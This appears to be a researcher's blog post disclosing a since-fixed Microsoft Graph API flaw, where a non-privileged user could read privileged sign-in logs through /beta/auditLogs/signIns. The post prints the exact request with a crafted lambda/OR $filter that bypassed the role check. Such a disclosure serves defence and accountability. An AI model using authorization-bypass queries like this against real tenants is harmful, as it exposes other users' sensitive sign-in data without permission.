Microsoft Cloud Security Research – Public Disclosure – Gaining Unlimited access to graph AuditLogs endpoint using complex filters with non-privileged user account

Background

Not so long a go I was investigating various Azure related portals, and one of them caught my attention. While that portal did not yield any obvious vectors for exploitation, it raised my interest to see if I could go beyond user reading their own logs¹

¹Users can read their own sign-in logs to manually look for uncommon behaviour (this is standard behaviour)

Scope

The issue described allowed unprivileged user to modify graph search filters so that user could access logs which would normally require admin roles.

Affected service

• Graph API AuditLogs endpoint
• Endpoint and operation tested to be vulnerable /beta/auditLogs/signIns

MSRC Categorization

• Severity: Important
• Security Impact: Information Disclosure

Timeline

MSRC (Microsoft Security Response Center) provided fast response and proceeded to fix the issue in fast timeline

• 02/2022 Finding submitted to MSRC
• 03/2022 MSRC confirms the reported behaviour
• 03/2022 MSRC confirms that fix has been issued for the described vulnerability

Details

What I discovered was, that Graph API allowed non-privileged user to access privileged logs when utilizing advanced lambda operators – Essentially calling /auditLogs endpoint beyond their own permissions.

❌ Trying to get user logs with basic filters

    code:'Authentication_RequestFromUnsupportedUserRole'
    innerError:{date: '2022-01-27T12:13:45', request-id: '05b046db-27ba-405c-8532-35ce96025018', client-request-id: '05b046db-27ba-405c-8532-35ce96025018'}
    message:'User is not in the allowed roles'

✅ When complex filtering with lambda operators and multiple OR conditions was used user got access to sensitive logs

var operation = `https://graph.microsoft.com/beta/auditLogs/signIns?&$filter=signInEventTypes/any(t: t eq 'interactiveUser' or t eq 'nonInteractiveUser' or userId eq 'fff4c705-62e2-4215-9dc8-90f208d15267' )`

✅ Below is example snippet of the Graph API call with exploitable filter being used.

⚠️The result was full dump of sensitive sign-in logs

Ending words

As always, when there is something more complex being applied to authorization process things tend to get more interesting. This shall definitely be something I will stay on a lookout

Be sure to follow MSRC on twitter, and stay tuned for more security research on my blog!